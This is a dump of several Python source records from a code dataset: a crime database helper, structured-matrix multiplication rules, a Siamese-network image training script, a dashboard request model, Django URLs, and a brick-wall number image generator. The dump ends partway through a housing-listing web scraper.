'%d-%m-%y'),\n })\n return json_crimes\n finally:\n connection.close()\n\n def add_crime(self,category,title,date,latitude,longitude,description):\n connection = self.connect()\n try:\n query = \"INSERT INTO crimes (category,title,date,latitude,longitude,description) VALUES (%s, %s, %s, %s, %s, %s);\"\n with connection.cursor() as cursor:\n cursor.execute(query,(category,title,date,latitude,longitude,description))\n connection.commit()\n except Exception as e:\n print(e)\n finally:\n connection.close()\n","sub_path":"dbhelper.py","file_name":"dbhelper.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29103323","text":"import lab as B\nfrom algebra import proven\nfrom wbml.warning import warn_upmodule\n\nfrom .util import align_batch\nfrom ..constant import Constant, Zero\nfrom ..diagonal import Diagonal\nfrom ..kronecker import Kronecker\nfrom ..lowrank import LowRank\nfrom ..matrix import AbstractMatrix, Dense, structured\nfrom ..shape import assert_compatible\nfrom ..triangular import LowerTriangular, UpperTriangular\nfrom ..util import ToDenseWarning, redirect\nfrom ..woodbury import Woodbury\n\n__all__ = []\n\n\ndef _reverse_call(t0, t1):\n @B.multiply.dispatch\n def multiply(a: t1, b: t0):\n return multiply(b, a)\n\n\n# Zero\n\n\n@B.dispatch(precedence=proven())\ndef multiply(a: AbstractMatrix, b: Zero):\n assert_compatible(B.shape(a), B.shape(b))\n return B.broadcast_to(b, *B.shape_broadcast(a, b))\n\n\n@B.dispatch(precedence=proven())\ndef multiply(a: Zero, b: AbstractMatrix):\n assert_compatible(B.shape(a), B.shape(b))\n return B.broadcast_to(a, *B.shape_broadcast(a, b))\n\n\n# Dense\n\n\n@B.dispatch\ndef multiply(a: AbstractMatrix, b: AbstractMatrix):\n if structured(a, b):\n warn_upmodule(\n f\"Multiplying {a} and {b}: converting to dense.\", category=ToDenseWarning\n )\n return Dense(B.multiply(B.dense(a), B.dense(b)))\n\n\n@B.dispatch\ndef multiply(a: Dense, b: Dense):\n return Dense(B.multiply(a.mat, b.mat))\n\n\n# Diagonal\n\n\n@B.dispatch\ndef multiply(a: Diagonal, b: Diagonal):\n return Diagonal(B.multiply(a.diag, b.diag))\n\n\n@B.dispatch\ndef multiply(a: Diagonal, b: AbstractMatrix):\n assert_compatible(B.shape(a), B.shape(b))\n # In the case of broadcasting, `B.diag(b)` will get the diagonal of `b`, which may\n # not be equalt to the diagonal broadcasted version of `b`.\n rows, cols = B.shape_matrix(b)\n if rows == 1:\n # Due to broadcasting, the diagonal will be the one column.\n b_diag = B.squeeze(B.dense(b), axis=-2)\n elif cols == 1:\n # Due to broadcasting, the diagonal will be the one row.\n b_diag = B.squeeze(B.dense(b), axis=-1)\n else:\n # No broadcasting happening. Just get the diagonal.\n b_diag = B.diag(b)\n return Diagonal(B.multiply(a.diag, b_diag))\n\n\n_reverse_call(Diagonal, AbstractMatrix)\n\n\n# Constant\n\n\n@B.dispatch\ndef multiply(a: Constant, b: Constant):\n assert_compatible(B.shape(a), B.shape(b))\n return Constant(B.multiply(a.const, b.const), *B.shape_broadcast(a, b))\n\n\n@B.dispatch\ndef multiply(a: Constant, b: AbstractMatrix):\n assert_compatible(B.shape(a), B.shape(b))\n if structured(b):\n warn_upmodule(\n f\"Multiplying {a} and {b}: converting to dense.\", category=ToDenseWarning\n )\n return Dense(\n B.broadcast_to(\n B.multiply(\n B.expand_dims(a.const, axis=-1, times=2, ignore_scalar=True),\n B.dense(b),\n ),\n *B.shape_broadcast(a, b),\n )\n )\n\n\n@B.dispatch\ndef multiply(a: Constant, b: Diagonal):\n assert_compatible(B.shape(a), B.shape(b))\n return Diagonal(\n B.multiply(B.expand_dims(a.const, axis=-1, ignore_scalar=True), b.diag)\n )\n\n\n_reverse_call(Constant, AbstractMatrix)\n_reverse_call(Constant, Diagonal)\n\n\n# LowerTriangular\n\n\n@B.dispatch\ndef multiply(a: LowerTriangular, b: LowerTriangular):\n return LowerTriangular(B.multiply(a.mat, b.mat))\n\n\n@B.dispatch\ndef multiply(a: LowerTriangular, b: AbstractMatrix):\n # TODO: Optimise away `B.dense` call.\n return LowerTriangular(B.multiply(a.mat, B.dense(b)))\n\n\n@B.dispatch\ndef multiply(a: LowerTriangular, b: Constant):\n return LowerTriangular(\n B.multiply(a.mat, B.expand_dims(b.const, axis=-1, times=2, ignore_scalar=True))\n )\n\n\n_reverse_call(LowerTriangular, AbstractMatrix)\n_reverse_call(LowerTriangular, Constant)\n\nredirect(B.multiply, (LowerTriangular, Diagonal), (AbstractMatrix, Diagonal))\n\n\n# UpperTriangular\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: UpperTriangular):\n return UpperTriangular(B.multiply(a.mat, b.mat))\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: LowerTriangular):\n return Diagonal(B.multiply(B.diag(a), B.diag(b)))\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: AbstractMatrix):\n # TODO: Optimise away `B.dense` call.\n return UpperTriangular(B.multiply(a.mat, B.dense(b)))\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: Constant):\n return UpperTriangular(\n B.multiply(a.mat, B.expand_dims(b.const, axis=-1, times=2, ignore_scalar=True))\n )\n\n\n_reverse_call(UpperTriangular, LowerTriangular)\n_reverse_call(UpperTriangular, AbstractMatrix)\n_reverse_call(UpperTriangular, Constant)\n\nredirect(B.multiply, (UpperTriangular, Diagonal), (AbstractMatrix, Diagonal))\n\n\n# LowRank\n\n\n@B.dispatch\ndef multiply(a: LowRank, b: LowRank):\n assert_compatible(B.shape(a), B.shape(b))\n\n if structured(a.left, a.right, b.left, b.right):\n warn_upmodule(\n f\"Multiplying {a} and {b}: converting factors to dense.\",\n category=ToDenseWarning,\n )\n al, am, ar = B.dense(a.left), B.dense(a.middle), B.dense(a.right)\n bl, bm, br = B.dense(b.left), B.dense(b.middle), B.dense(b.right)\n\n # Perform broadcasting of batch dimensions.\n al, am, ar, bl, bm, br = align_batch(al, am, ar, bl, bm, br)\n offset = len(B.shape_batch(al))\n\n # Pick apart the matrices.\n al, ar = B.unstack(al, axis=offset + 1), B.unstack(ar, axis=offset + 1)\n bl, br = B.unstack(bl, axis=offset + 1), B.unstack(br, axis=offset + 1)\n am = [B.unstack(x, axis=offset) for x in B.unstack(am, axis=offset)]\n bm = [B.unstack(x, axis=offset) for x in B.unstack(bm, axis=offset)]\n\n # Construct the factors.\n left = B.stack(\n *[B.multiply(ali, blk) for ali in al for blk in bl],\n axis=offset + 1,\n )\n right = B.stack(\n *[B.multiply(arj, brl) for arj in ar for brl in br],\n axis=offset + 1,\n )\n middle = B.stack(\n *[\n B.stack(*[amij * bmkl for amij in ami for bmkl in bmk], axis=offset)\n for ami in am\n for bmk in bm\n ],\n axis=offset,\n )\n\n return LowRank(left, right, middle)\n\n\n@B.dispatch\ndef multiply(a: Constant, b: LowRank):\n assert_compatible(B.shape(a), B.shape(b))\n return LowRank(\n b.left,\n b.right,\n B.multiply(\n B.expand_dims(a.const, axis=-1, times=2, ignore_scalar=True),\n b.middle,\n ),\n )\n\n\n@B.dispatch\ndef multiply(a: LowRank, b: Constant):\n return multiply(b, a)\n\n\n# Woodbury\n\n\n@B.dispatch\ndef multiply(a: Woodbury, b: AbstractMatrix):\n # Expand out Woodbury matrices.\n return B.add(B.multiply(a.diag, b), B.multiply(a.lr, b))\n\n\n@B.dispatch\ndef multiply(a: AbstractMatrix, b: Woodbury):\n return multiply(b, a)\n\n\nredirect(B.multiply, (Woodbury, Woodbury), (Woodbury, AbstractMatrix), reverse=False)\nredirect(B.multiply, (Woodbury, Diagonal), (AbstractMatrix, Diagonal))\nredirect(B.multiply, (Woodbury, Constant), (Woodbury, AbstractMatrix))\nredirect(B.multiply, (Woodbury, LowerTriangular), (Woodbury, AbstractMatrix))\nredirect(B.multiply, (Woodbury, UpperTriangular), (Woodbury, AbstractMatrix))\n\n\n# Kronecker\n\n\n@B.dispatch\ndef multiply(a: Kronecker, b: Kronecker):\n left_compatible = B.shape_matrix(a.left) == B.shape_matrix(b.left)\n right_compatible = B.shape_matrix(a.right) == B.shape_matrix(b.right)\n if not (left_compatible and right_compatible):\n raise AssertionError(\n f\"Kronecker products {a} and {b} must be compatible, but they are not.\"\n )\n return Kronecker(B.multiply(a.left, b.left), B.multiply(a.right, b.right))\n\n\n@B.dispatch\ndef multiply(a: Constant, b: Kronecker):\n assert_compatible(B.shape(a), B.shape(b))\n return Kronecker(\n B.multiply(\n B.expand_dims(a.const, axis=-1, times=2, ignore_scalar=True), b.left\n ),\n b.right,\n )\n\n\n@B.dispatch\ndef multiply(a: Kronecker, b: Constant):\n return multiply(b, a)\n","sub_path":"matrix/ops/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"121304855","text":"'''\nThis script is not used for the final result, but it is to show that we also tried to use Siamese netwoks with triplet loss\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils.random import sample_without_replacement\nfrom pathlib import Path\nfrom tensorflow.python.keras.models import load_model, save_model\nfrom tensorflow.keras import applications\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import metrics\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.applications import resnet\n\nIMAGE_WIDTH = 300\nIMAGE_HEIGHT = 300\ntarget_shape = (IMAGE_HEIGHT, IMAGE_WIDTH)\n\nROOT_DIRECTORY = \"./\"\nIMAGE_DIRECTORY = ROOT_DIRECTORY + \"task4_data/food/food/\"\nTRIPLETS_DIRECTORY = ROOT_DIRECTORY + \"task4_data/\"\nCHECKPOINTS_DIRECTORY = ROOT_DIRECTORY + \"task4_data/checkpoints/\"\n\n\ndef preprocess_image(filename):\n \"\"\"\n Load the specified file as a JPEG image, preprocess it and\n resize it to the target shape.\n \"\"\"\n\n image_string = tf.io.read_file(filename)\n image = tf.image.decode_jpeg(image_string, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n # Resize the image to match the target size\n image = tf.image.resize(image, target_shape)\n image = resnet.preprocess_input(image)\n return image\n\n\ndef preprocess_triplets(anchor, positive, negative):\n \"\"\"\n Given the filenames corresponding to the three images, load and\n preprocess them.\n \"\"\"\n\n return (\n preprocess_image(anchor),\n preprocess_image(positive),\n preprocess_image(negative),\n )\n\naugment_image = tf.keras.Sequential([\n layers.experimental.preprocessing.RandomFlip(\"horizontal_and_vertical\"),\n layers.experimental.preprocessing.RandomRotation(0.2),\n layers.experimental.preprocessing.RandomZoom(0.2),\n layers.experimental.preprocessing.RandomContrast(0.3),\n])\n\n\ndef augment_triplets(anchor, positive, negative):\n \"\"\"\n Augment a triplet.\n \"\"\"\n\n return (\n augment_image(anchor),\n augment_image(positive),\n augment_image(negative),\n )\n\n\nclass DistanceLayer(layers.Layer):\n \"\"\"\n This layer is responsible for computing the distance between the anchor\n embedding and the positive embedding, and the anchor embedding and the\n negative embedding.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def call(self, anchor, positive, negative):\n ap_distance = tf.reduce_sum(tf.square(anchor - positive), -1)\n an_distance = tf.reduce_sum(tf.square(anchor - negative), -1)\n return (ap_distance, an_distance)\n\n\nclass SiameseModel(Model):\n \"\"\"The Siamese Network model with a custom training and testing loops.\n Computes the triplet loss using the three embeddings produced by the\n Siamese Network.\n The triplet loss is defined as:\n L(A, P, N) = max(‖f(A) - f(P)‖² - ‖f(A) - f(N)‖² + margin, 0)\n \"\"\"\n\n def __init__(self, siamese_network, margin=0.5):\n super(SiameseModel, self).__init__()\n self.siamese_network = siamese_network\n self.margin = margin\n self.loss_tracker = metrics.Mean(name=\"loss\")\n self.acc_tracker = metrics.Mean(name=\"acc\")\n\n def call(self, inputs):\n return self.siamese_network(inputs)\n\n def train_step(self, data):\n # GradientTape is a context manager that records every operation that\n # you do inside. We are using it here to compute the loss so we can get\n # the gradients and apply them using the optimizer specified in\n # `compile()`.\n with tf.GradientTape() as tape:\n ap_distance, an_distance = self._compute_distances(data)\n loss = self._compute_loss(ap_distance, an_distance)\n acc = self._compute_acc(ap_distance, an_distance)\n\n # Storing the gradients of the loss function with respect to the\n # weights/parameters.\n gradients = tape.gradient(loss, self.siamese_network.trainable_weights)\n\n # Applying the gradients on the model using the specified optimizer\n self.optimizer.apply_gradients(\n zip(gradients, self.siamese_network.trainable_weights)\n )\n\n # Let's update and return the training loss metric.\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n def test_step(self, data):\n ap_distance, an_distance = self._compute_distances(data)\n loss = self._compute_loss(ap_distance, an_distance)\n acc = self._compute_acc(ap_distance, an_distance)\n\n # Let's update and return the loss metric.\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n def _compute_distances(self, data):\n # The output of the network is a tuple containing the distances\n # between the anchor and the positive example, and the anchor and\n # the negative example.\n ap_distance, an_distance = self.siamese_network(data)\n return ap_distance, an_distance\n\n def _compute_loss(self, ap_distance, an_distance):\n # Computing the Triplet Loss by subtracting both distances and\n # making sure we don't get a negative value.\n loss = ap_distance - an_distance\n loss = tf.maximum(loss + self.margin, 0.0)\n return loss\n\n def _compute_acc(self, ap_distance, an_distance):\n # Cmomputing the accuracy\n acc = tf.math.reduce_mean(tf.cast(ap_distance < an_distance, dtype=tf.float32))\n return acc\n\n @property\n def metrics(self):\n # We need to list our metrics here so the `reset_states()` can be\n # called automatically.\n return [self.loss_tracker, self.acc_tracker]\n\n\ndef create_embedding():\n\n base_cnn = resnet.ResNet50(\n weights=\"imagenet\", input_shape=target_shape + (3,), pooling=\"max\", include_top=False\n )\n\n dense1 = layers.Dropout(0.3)(base_cnn.output)\n output = layers.Dense(128)(dense1)\n\n embedding = Model(base_cnn.input, output, name=\"Embedding\")\n\n trainable = False\n for layer in base_cnn.layers:\n if layer.name == \"conv5_block3_1_conv\":\n trainable = True\n layer.trainable = trainable\n\n return embedding\n\n\ndef create_model():\n\n embedding = create_embedding()\n\n\n anchor_input = layers.Input(name=\"anchor\", shape=target_shape + (3,))\n positive_input = layers.Input(name=\"positive\", shape=target_shape + (3,))\n negative_input = layers.Input(name=\"negative\", shape=target_shape + (3,))\n\n distances = DistanceLayer()(\n embedding(anchor_input),\n embedding(positive_input),\n embedding(negative_input),\n )\n\n siamese_network = Model(\n inputs=[anchor_input, positive_input, negative_input], outputs=distances\n )\n\n return embedding, siamese_network\n\n\ndef make_train_validation_test_triplets_list(triplet_file, random_seed=None):\n\n random.seed(random_seed)\n\n triplets = np.loadtxt(triplet_file)\n\n # sample part of the triplets\n n_triplets = len(triplets)\n triplets = triplets[sample_without_replacement(n_population=n_triplets, n_samples=40000)]\n\n train_triplets_file = \"./train_triplets_list.txt\"\n validation_triplets_file = \"./validation_triplets_list.txt\"\n test_triplets_file = \"./test_triplets_list.txt\"\n\n if os.path.exists(train_triplets_file) and os.path.exists(validation_triplets_file) and os.path.exists(test_triplets_file):\n triplets_train = np.loadtxt(train_triplets_file)\n triplets_validation = np.loadtxt(validation_triplets_file)\n triplets_test = np.loadtxt(test_triplets_file)\n \n else:\n train_images = random.sample(range(0, 5000), 3600) #list(range(0, 3800))\n\n triplets_train = [ t for t in triplets if (t[0] in train_images and t[1] in train_images and t[2] in train_images) ]\n triplets_vt = [ t for t in triplets if (t[0] not in train_images and t[1] not in train_images and t[2] not in train_images) ]\n\n triplets_validation, triplets_test = train_test_split(triplets_vt, train_size=0.5)\n\n np.savetxt(train_triplets_file, triplets_train)\n np.savetxt(validation_triplets_file, triplets_validation)\n np.savetxt(test_triplets_file, triplets_test)\n\n print(\"Train dataset size: %d\" %(len(triplets_train)))\n print(\"Validation dataset size: %d\" %(len(triplets_validation)))\n print(\"Test dataset size: %d\" %(len(triplets_test)))\n\n\n return triplets_train, triplets_validation, triplets_test\n\n\ndef make_list_of_image_paths(image_directory):\n return [ image_directory+(\"%05d.jpg\" %x) for x in range(10000) ]\n\n\ndef make_anchor_positive_negative_datasets(list_of_image_paths, triplets):\n\n anchor_images = [ list_of_image_paths[int(t[0])] for t in triplets ]\n positive_images = [ list_of_image_paths[int(t[1])] for t in triplets ]\n negative_images = [ list_of_image_paths[int(t[2])] for t in triplets ]\n\n anchor_dataset = tf.data.Dataset.from_tensor_slices(anchor_images)\n positive_dataset = tf.data.Dataset.from_tensor_slices(positive_images)\n negative_dataset = tf.data.Dataset.from_tensor_slices(negative_images)\n\n return anchor_dataset, positive_dataset, negative_dataset\n\n\ndef preprocess_dataset(list_of_image_paths, triplets, batch_size=16, shuffle=False, augment=False, random_seed=None):\n\n # Make anchor, positive, negativ images datasets\n anchor_dataset, positive_dataset, negative_dataset = make_anchor_positive_negative_datasets(list_of_image_paths, triplets)\n dataset = tf.data.Dataset.zip((anchor_dataset, positive_dataset, negative_dataset))\n \n # Shuffle\n if shuffle:\n dataset = dataset.shuffle(buffer_size=1024, seed=random_seed)\n \n # Preprocess\n dataset = dataset.map(preprocess_triplets)\n\n # Batch size\n dataset = dataset.batch(batch_size, drop_remainder=False)\n\n # Data augmentation\n if augment:\n dataset = dataset.map(augment_triplets)\n\n \n return dataset\n\n\ndef preprocess_dataset_test(list_of_image_paths, triplets, batch_size=16, random_seed=None):\n\n # Make anchor, positive, negativ images datasets\n anchor_dataset, positive_dataset, negative_dataset = make_anchor_positive_negative_datasets(list_of_image_paths, triplets)\n \n # Preprocess\n anchor_dataset = anchor_dataset.map(preprocess_image)\n positive_dataset = positive_dataset.map(preprocess_image)\n negative_dataset = negative_dataset.map(preprocess_image)\n \n # Batch size\n anchor_dataset = anchor_dataset.batch(batch_size, drop_remainder=False)\n positive_dataset = positive_dataset.batch(batch_size, drop_remainder=False)\n negative_dataset = negative_dataset.batch(batch_size, drop_remainder=False)\n\n return anchor_dataset, positive_dataset, negative_dataset\n\n\ndef load_triplets(triplets_train, triplets_validation, triplets_test, image_directory=IMAGE_DIRECTORY, random_seed=None):\n\n batch_size = 32\n\n list_of_image_paths = make_list_of_image_paths(image_directory)\n\n dataset_train = preprocess_dataset(list_of_image_paths, triplets_train , batch_size=batch_size, shuffle=True, augment=True , random_seed=random_seed)\n dataset_val = preprocess_dataset(list_of_image_paths, triplets_validation, batch_size=batch_size, shuffle=True, augment=False, random_seed=random_seed)\n dataset_test = preprocess_dataset(list_of_image_paths, triplets_test , batch_size=batch_size, shuffle=True, augment=False, random_seed=random_seed)\n\n return dataset_train, dataset_val, dataset_test\n\n\ndef load_test_dataset(triplets, image_directory=IMAGE_DIRECTORY, random_seed=None):\n\n batch_size = 32\n\n list_of_image_paths = make_list_of_image_paths(image_directory)\n anchor_dataset, positive_dataset, negative_dataset = preprocess_dataset_test(list_of_image_paths, triplets, batch_size=batch_size, random_seed=random_seed)\n\n return anchor_dataset, positive_dataset, negative_dataset\n\n\ndef distance(f1, f2):\n \"\"\"Compute distance between arrays of features.\"\"\"\n\n return np.sum((np.sum([f1, -f2], axis=0))**2, axis=1)\n\n\ndef make_predictions(features_a, features_b, features_c):\n \"\"\"Compute predictions\"\"\"\n\n d_ab = distance(features_a, features_b)\n d_ac = distance(features_a, features_c)\n pred = d_ab < d_ac\n return pred\n\n\ndef main_train(random_seed=1234):\n\n \n ## Make train data\n print(\"\\nMaking datasets...\")\n triplet_file = TRIPLETS_DIRECTORY + \"train_triplets.txt\"\n triplets_train, triplets_validation, triplets_test = make_train_validation_test_triplets_list(triplet_file, random_seed=random_seed)\n dataset_train, dataset_val, dataset_test = load_triplets(triplets_train, triplets_validation, triplets_test,random_seed=random_seed)\n\n\n embedding, siamese_network = create_model()\n \n print(\"\\nSiamese summary:\")\n print(siamese_network.summary())\n\n print(\"\\nEmbedding summary:\")\n print(embedding.summary())\n\n siamese_model = SiameseModel(siamese_network)\n siamese_model.compile(optimizer=optimizers.Adam())\n\n \n if not os.path.exists(CHECKPOINTS_DIRECTORY): os.makedirs(CHECKPOINTS_DIRECTORY)\n checkpoint_filepath = CHECKPOINTS_DIRECTORY + '{epoch:02d}-{val_loss:.2f}-{val_acc:.2f}.h5'\n model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n save_weights_only=True,\n monitor='val_loss',\n save_best_only=False,\n save_freq=\"epoch\",\n )\n siamese_model.fit(dataset_train, epochs=10, validation_data=dataset_val, callbacks=[model_checkpoint_callback])\n\n embedding.save_weights(\"test_emb.h5\")\n siamese_network.save_weights(\"test_sia.h5\")\n\n return embedding, siamese_network\n\n\ndef main_predict(embedding=None, random_seed=1234):\n\n ## Make train data\n print(\"\\nMaking datasets...\")\n triplet_file = TRIPLETS_DIRECTORY + \"train_triplets.txt\"\n triplets_train, triplets_validation, triplets_test = make_train_validation_test_triplets_list(triplet_file, random_seed=random_seed)\n anchor_dataset, positive_dataset, negative_dataset = load_test_dataset(triplets_validation, random_seed=random_seed)\n\n if embedding is None:\n embedding, siamese_network = create_model()\n siamese_network.load_weights(CHECKPOINTS_DIRECTORY + \"03-0.66.h5\")\n else:\n embedding = embedding\n\n\n features_a = embedding.predict(anchor_dataset)\n features_b = embedding.predict(positive_dataset)\n features_c = embedding.predict(negative_dataset)\n\n predictions = make_predictions(features_a, features_b, features_c)\n print(predictions)\n print(np.mean(predictions==1))\n\n\n\nrandom_seed = None\nembedding, siamese_network = main_train(random_seed=random_seed)\nmain_predict(embedding=embedding, random_seed=random_seed)\n\n","sub_path":"task4/submission_folder/code/siamese_network.py","file_name":"siamese_network.py","file_ext":"py","file_size_in_byte":15007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"644924930","text":"from dataclasses import dataclass\nfrom base.common.models.request import SimpleRequestModel, BaseRequestModelKeys\n\n\n@dataclass\nclass AddDashboardRequestParams(BaseRequestModelKeys):\n DASHBOARD_CODE: str = \"DashboardCode\"\n DASHBOARD_TITLE: str = \"DashboardTitle\"\n DASHBOARD_HTML: str = \"DashboardHTML\"\n IS_VENDOR_MAINTAINED: str = \"IsVendorMaintained\"\n\n\nclass AddDashboardRequest(SimpleRequestModel):\n def __init__(self, dashboard_code, dashboard_title, dashboard_html, is_vendor_maintained, session_id, nonce,\n pretty_print):\n self.dashboard_code = dashboard_code\n self.dashboard_title = dashboard_title\n self.dashboard_html = dashboard_html\n self.is_vendor_maintained = is_vendor_maintained\n super().__init__(session_id=session_id, nonce=nonce, pretty_print=pretty_print)\n\n def to_params(self):\n args = super().to_params()\n args[AddDashboardRequestParams.DASHBOARD_CODE] = self.dashboard_code\n args[AddDashboardRequestParams.DASHBOARD_TITLE] = self.dashboard_title\n args[AddDashboardRequestParams.DASHBOARD_HTML] = self.dashboard_html\n args[AddDashboardRequestParams.IS_VENDOR_MAINTAINED] = self.is_vendor_maintained\n return args\n","sub_path":"APIs/dashboards/requests/add_dashboard.py","file_name":"add_dashboard.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"162354847","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^signup/$', views.signup, name='signup'),\n url(r'^$', views.index, name='index'),\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^offer_ride/$', views.offer_ride, name='offer_ride'), \n url(r'^join_ride/$', views.join_ride, name='join_ride'),\n]","sub_path":"smartpool/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"511565285","text":"import os\nimport threading\nfrom typing import List\n\nfrom PIL import Image\nimport random\nimport time\n\n\nclass make_wall:\n def __init__(self, numbers, filename, choice):\n numbers = numbers[::-1]\n cwd = os.getcwd()\n # print(\"Current working directory: {0}\".format(cwd))\n\n # print(numbers, filename, choice, wall_done)\n self.number_1_choice = numbers[0]\n self.number_2_choice = numbers[1]\n self.number_3_choice = numbers[2]\n self.wall = Image.new('RGB', (240, 650))\n self.path = \"birds_game_wall/\"\n self.file = filename\n self.choice = choice\n\n def put_numbers_on_wall(self, n, y_offset_n, x_offset_n):\n\n number_1 = [[0, 0, 1, 0], [0, 1, 1, 0], [0, 0, 1, 0], [0, 0, 1, 0], [0, 1, 1, 1]]\n number_2 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 0, 1, 0], [0, 1, 0, 0], [1, 1, 1, 1]]\n number_3 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 0, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0]]\n number_4 = [[0, 0, 1, 1], [0, 1, 0, 1], [1, 1, 1, 1], [0, 0, 0, 1], [0, 0, 0, 1]]\n number_5 = [[1, 1, 1, 1], [1, 0, 0, 0], [1, 1, 1, 0], [0, 0, 0, 1], [1, 1, 1, 0]]\n number_6 = [[0, 1, 1, 1], [1, 0, 0, 0], [1, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0]]\n number_7 = [[1, 1, 1, 1], [0, 0, 0, 1], [0, 0, 1, 0], [0, 0, 1, 0], [0, 0, 1, 0]]\n number_8 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0]]\n number_9 = [[0, 1, 1, 0], [1, 0, 0, 1], [0, 1, 1, 1], [0, 0, 0, 1], [0, 0, 0, 1]]\n number_0 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 0, 1], [1, 0, 0, 1], [0, 1, 1, 0]]\n\n numbers = [int(i) if i != '-' else \"-\" for i in str(n)]\n original_y = y_offset_n\n\n for number in numbers:\n original_x = x_offset_n\n y_offset_n = original_y\n if number == 0:\n choice = number_0\n elif number == 1:\n choice = number_1\n elif number == 2:\n choice = number_2\n elif number == 3:\n choice = number_3\n elif number == 4:\n choice = number_4\n elif number == 5:\n choice = number_5\n elif number == 6:\n choice = number_6\n elif number == 7:\n choice = number_7\n elif number == 8:\n choice = number_8\n elif number == 9:\n choice = number_9\n\n y = 0\n x = 0\n image_numbers = Image.open(self.path + 'brick_wall_letter.png')\n if number == '-':\n # handle negative\n self.wall.paste(image_numbers, (x_offset_n - 20, y_offset_n + 50))\n self.wall.paste(image_numbers, (x_offset_n - 20 - 10, y_offset_n + 50))\n continue\n\n while True:\n if choice[y][x] == 1:\n self.wall.paste(image_numbers, (x_offset_n, y_offset_n))\n x_offset_n += image_numbers.size[0]\n x += 1\n if x == 4:\n x_offset_n = original_x\n y_offset_n += image_numbers.size[1]\n x = 0\n y += 1\n if y == 5:\n break\n\n x_offset_n += 60\n\n return y_offset_n\n\n def create_wall(self, callback = None):\n x_offset = 0\n y_offset = 0\n y_wall = Image.new('RGB', (12, 650))\n wall_chosen = random.choice(['brick_wall_plain.png', 'red_brick.png', 'brown_brick.png'])\n image = Image.open(self.path + wall_chosen)\n for _ in range(650 // 25):\n y_wall.paste(image, (x_offset, y_offset))\n y_offset += image.size[1]\n y_offset = 0\n for _ in range(20):\n self.wall.paste(y_wall, (x_offset, y_offset))\n x_offset += image.size[0]\n\n image_window = Image.open(self.path + 'basicWindow.png')\n self.wall.paste(image_window, (0, 50))\n self.wall.paste(image_window, (0, 250))\n self.wall.paste(image_window, (0, 450))\n\n self.wall.paste(image_window, (230, 50))\n self.wall.paste(image_window, (230, 250))\n self.wall.paste(image_window, (230, 450))\n numbers = [self.number_1_choice, self.number_2_choice, self.number_3_choice]\n y_offset_n = 62\n x_offset_n = 40\n for number in numbers:\n y_offset_n = self.put_numbers_on_wall(number, y_offset_n, x_offset_n)\n y_offset_n += 75\n\n self.wall.save(self.path + self.file)\n callback and callback()\n\n\nclass WallGeneratorWorker(threading.Thread):\n def __init__(self, threadID, name, filename: str, numbers: List[int], callback=lambda: None):\n # print(\"WallGeneratorWorker\")\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.filename = filename\n self.numbers = numbers\n self.callback = callback\n\n def run(self):\n # print(\"run\")\n choice = True\n try:\n start = make_wall(self.numbers, self.filename, choice)\n # start_time = time.time()\n start.create_wall()\n # print(\"----------%s Time it Took-------------\" % (time.time() - start_time))\n except Exception as e:\n print(\"error\")\n print(str(e))\n time.sleep(1)\n self.on_done()\n\n def on_done(self):\n self.callback and self.callback()\n\n\nif __name__ == \"__main__\":\n filename = 'current_wall1.png'\n choice = True\n\n\n def wall_done():\n print(\"Wall_Done\")\n\n\n start = make_wall([-888, 600, 150], filename, choice)\n start.path = \"\"\n start_time = time.time()\n start.create_wall()\n print(\"----------%s Time it Took-------------\" % (time.time() - start_time))\n","sub_path":"birds_game_wall/wall_generator.py","file_name":"wall_generator.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"635719201","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nimport requests\nfrom lxml import etree\nimport re\nimport csv\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\ndef get_house_info(urls, output_path):\n header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}\n data = []\n for url in urls:\n r = requests.get(url, headers=header)\n if r.status_code == 200:\n html = etree.HTML(r.text)\n all_info = html.xpath('//div[@class=\"info clear\"]')\n for info in all_info:\n # 